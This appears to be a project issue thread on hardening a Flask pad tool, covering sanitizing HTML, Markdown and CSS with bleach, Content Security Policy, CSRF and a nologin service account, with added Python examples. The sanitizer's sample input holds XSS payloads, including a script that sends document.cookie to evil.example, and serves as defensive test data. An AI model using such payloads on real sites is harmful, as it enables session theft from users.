I will dive into this thread around the Televex project as a start: https://git.vvvvvvaria.org/varia/televex/issues/1
And besides that, check Crunk's work on distribusi-verse to see how sanitizing has been done in Flask: https://git.vvvvvvaria.org/crunk/distribusi-verse
Small research: XSS attacks are something to be careful with: https://en.wikipedia.org/wiki/Cross-site_scripting.
About sanitizing Markdown in combination with Mozilla's HTML Bleach Python library: https://github.com/Python-Markdown/markdown/issues/392
Bleach, by Mozilla: https://github.com/mozilla/bleach
What is a good CSS sanitizer? Crunk:
> I was looking at tinycss or bleach
> Yes, but I think you can use bleach for CSS too
> Above all, you don't want to let someone else's browser run CSS or JavaScript
On top of sanitizing the Markdown and CSS, would it be needed to add something like [Talisman](https://github.com/GoogleCloudPlatform/flask-talisman#content-security-policy) to configure Content Security Policy settings and things like that?
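To make the sanitizing discussion above concrete, here is an added example; it is not code from octomode, distribusi-verse or bleach. It implements, with only the Python standard library, the allowlist filtering the thread asks bleach to do (tags, attributes, URL schemes and `style` declarations), so the separate concerns are visible in one place; bleach does the same job on a tested HTML5 parser and is what should run in production. The `ALLOWED_*` lists, the `RENDERED` sample and the `example.org`/`evil.example` hosts are assumptions for illustration. The sample is the HTML a Markdown renderer would emit, because of the ordering point from the Python-Markdown issue: sanitize the rendered HTML, not the Markdown source, since a link like `[click](javascript:alert(1))` only becomes an `<a href>` after rendering.

```python
# Added example for this thread, not octomode's, distribusi-verse's or bleach's code.
# Standard library only, to show what bleach is asked to do; use bleach in production.
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allow-lists are assumptions for a pad site, not a recommendation for every app.
ALLOWED_TAGS = {"p", "a", "em", "strong", "code", "pre", "ul", "ol", "li",
                "blockquote", "h1", "h2", "h3", "br", "img", "span"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}, "span": {"style"}}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
ALLOWED_CSS_PROPS = {"color", "background-color", "font-weight", "font-style"}
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
# One "prop: value" declaration. The value class has no parentheses, quotes, backslashes
# or slashes, so url(...), expression(...), CSS escapes and comments never match.
_DECL = re.compile(r"^\s*([a-zA-Z-]+)\s*:\s*([a-zA-Z0-9#%,.\s-]+?)\s*$")

def clean_style(style):
    """Keep allow-listed properties with plain values; None if nothing is left."""
    kept = []
    for decl in style.split(";"):
        m = _DECL.match(decl)
        if m and m.group(1).lower() in ALLOWED_CSS_PROPS:
            kept.append(f"{m.group(1).lower()}: {m.group(2)}")
    return "; ".join(kept) or None

def clean_url(url):
    """Relative URLs and allow-listed schemes only; controls and spaces are stripped
    first so 'java\\tscript:' cannot hide the scheme."""
    url = re.sub(r"[\x00-\x20\x7f]", "", url)
    try:
        scheme = urlsplit(url).scheme.lower()
    except ValueError:  # e.g. malformed IPv6 host; never crash on attacker input
        return None
    return url if not scheme or scheme in ALLOWED_SCHEMES else None

def clean_attr(tag, name, value):
    """Cleaned attribute value, or None to drop the attribute entirely."""
    if name not in ALLOWED_ATTRS.get(tag, ()):
        return None  # drops every on* handler, srcdoc, formaction, ...
    if name in ("href", "src"):
        return clean_url(value)
    return clean_style(value) if name == "style" else value

class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open_tags, self.skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1  # drop the element with everything inside it
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag itself, keep its text
        safe = []
        for name, value in attrs:
            cleaned = clean_attr(tag, name, value or "")
            if cleaned is not None:
                safe.append(f' {name}="{escape(cleaned, quote=True)}"')
        self.out.append(f"<{tag}{''.join(safe)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
            return
        if self.skip or tag not in self.open_tags:
            return
        while self.open_tags:  # close down to the match so output stays balanced
            t = self.open_tags.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):  # <script>/<style> bodies arrive here too
        if not self.skip:
            self.out.append(escape(data, quote=False))

def sanitize(html):
    """Call as sanitize(markdown.markdown(source)), never markdown.markdown(sanitize(source))."""
    s = _Sanitizer()
    s.feed(html)
    s.close()
    while s.open_tags:  # close whatever the input left open
        s.out.append(f"</{s.open_tags.pop()}>")
    return "".join(s.out)

# Constructed sample of renderer output: normal formatting plus raw HTML passed through.
RENDERED = (
    '<p>Hello <strong>world</strong>, see <a href="https://example.org/">docs</a></p>\n'
    '<p><a href="java\tscript:alert(1)">click</a><img src="x" onerror="alert(1)">'
    '<span style="color: red; background: url(javascript:alert(1))">red</span></p>\n'
    '<script>fetch("https://evil.example/?c=" + document.cookie)</script>\n'
    '<style>body{display:none}</style>\n<p>literal &lt;script&gt; text stays text</p>')
```

`sanitize(RENDERED)` keeps the first paragraph as is; in the second the `javascript:` link loses its `href`, `onerror` disappears, the `background: url(...)` declaration is dropped while `color: red` survives, and the `<script>` and `<style>` elements vanish with their contents. Escaped text like `&lt;script&gt;` stays text. A Content Security Policy from Talisman is a second, independent layer: it limits what an injected script could do if the sanitizer ever missed something, but it does not replace sanitizing.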
Both the https://git.vvvvvvaria.org/crunk/distribusi-verse and https://git.vvvvvvaria.org/varia/varia-library-website also have CSRF protection.
More on that here: https://owasp.org/www-community/attacks/csrf
This is mostly when working with flask-wtf and wtforms.
Logging the following from the infra chat:
> I wouldn't worry about someone writing to the pads, since this can always happen anyway if someone knows the pad name
> What I am more worried about is whether a tool can be used to read and write to the server and, for example, execute arbitrary files
> If you, for example, make a system user who cannot launch a shell and have that user execute this software, things are already much safer
> One of the things you can and should do with Flask is use its inbuilt methods to serialize and deserialize things like HTML so that nothing funny can happen there
> Here is a thing I bookmarked yesterday with a nice exploit of the kind of stuff I would worry about: https://kaizoku.dev/htb-devoops#heading-gaining-foothold-user-shell
Would you do that with a `chroot`? I got confused reading that this involves `ssh`, and a system user does not use `ssh` to interact with the server, right?
> Would you do that with a chroot?
Using a `chroot` is complicated unfortunately... I like the suggestion in https://git.vvvvvvaria.org/varia/octomode/issues/2#issuecomment-725
> If you, for example, make a system user who cannot launch a shell and have that user execute this software, things are already much safer
So you just do a `nologin` system user which has no root permissions.
It should probably also be run as a limited-permissions user with a strictly defined set of folders, etc., that it can read from and write to.
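As an added example (not part of the thread or of octomode), here is what the nologin-user advice above looks like as a check that can run before the service starts. It assumes a Linux host on which the account was created beforehand with something like `useradd --system --shell /usr/sbin/nologin --home-dir /srv/octomode octomode`; the name `octomode`, the `/srv/octomode` paths and the `PRIVILEGED_GROUPS` list are placeholders. The check verifies that the account has no usable shell, is not root and sits in no privileged group, and that among a list of directories only the allowed ones are writable for it, evaluated with the ordinary owner/group/other permission bits:

```python
"""Pre-start audit for running the app as a nologin system user that can only
write where it is meant to. Added example for this thread, not octomode's code.
Assumes Linux; "octomode" and /srv/octomode are placeholders. Create the account
first, e.g. on Debian-style hosts:
    useradd --system --shell /usr/sbin/nologin --home-dir /srv/octomode octomode
"""
import grp
import os
import pwd
import stat
from dataclasses import dataclass

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
PRIVILEGED_GROUPS = {"root", "sudo", "wheel", "adm", "docker"}  # assumed list


@dataclass(frozen=True)
class Account:
    name: str
    uid: int
    gid: int
    shell: str
    gids: frozenset         # primary + supplementary group ids
    group_names: frozenset  # the same groups by name

    @classmethod
    def from_system(cls, name):
        pw = pwd.getpwnam(name)
        groups = [grp.getgrgid(pw.pw_gid)]
        groups += [g for g in grp.getgrall() if name in g.gr_mem]
        return cls(pw.pw_name, pw.pw_uid, pw.pw_gid, pw.pw_shell,
                   frozenset(g.gr_gid for g in groups),
                   frozenset(g.gr_name for g in groups))


def account_problems(acct):
    """Reasons the account is not a safe service account (empty list = fine)."""
    problems = []
    if acct.shell not in NOLOGIN_SHELLS:
        problems.append(f"login shell is {acct.shell}, expected a nologin shell")
    if acct.uid == 0:
        problems.append("uid is 0")
    if 0 in acct.gids:
        problems.append("member of gid 0 (root group)")
    priv = sorted(acct.group_names & PRIVILEGED_GROUPS)
    if priv:
        problems.append("member of privileged group(s): " + ", ".join(priv))
    return problems


def can_write(acct, mode, owner_uid, owner_gid):
    """Classic Unix check for the write bit as this account would see it."""
    if acct.uid == 0:
        return True
    if owner_uid == acct.uid:
        return bool(mode & stat.S_IWUSR)
    if owner_gid in acct.gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def writable_paths(acct, paths):
    """Of the existing paths given, those the account could write to."""
    out = []
    for p in paths:
        st = os.stat(p)
        if can_write(acct, st.st_mode, st.st_uid, st.st_gid):
            out.append(p)
    return out


def audit(acct, allowed_writable, paths_to_check):
    """account_problems plus every checked path that is writable but not allowed."""
    problems = account_problems(acct)
    for p in writable_paths(acct, paths_to_check):
        if p not in allowed_writable:
            problems.append(f"{p} is writable by {acct.name} but not in the allow-list")
    return problems


if __name__ == "__main__":
    import sys
    svc = Account.from_system("octomode")
    # Code directory read-only for the service, data directory the only writable one.
    # /tmp is world-writable by design; a systemd unit with PrivateTmp= handles that.
    issues = audit(svc, allowed_writable={"/srv/octomode/data"},
                   paths_to_check=["/srv/octomode", "/srv/octomode/data", "/etc"])
    print("\n".join(issues) or "ok")
    sys.exit(1 if issues else 0)
```

The point of keeping the code directory root-owned and only the data directory writable is the one from the infra chat: even if the sanitizer or the framework fails and the app can be made to write files, the account executing it can reach neither a shell nor the rest of the filesystem.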
d5369bc142, I successfully used bleach in distribusi-verse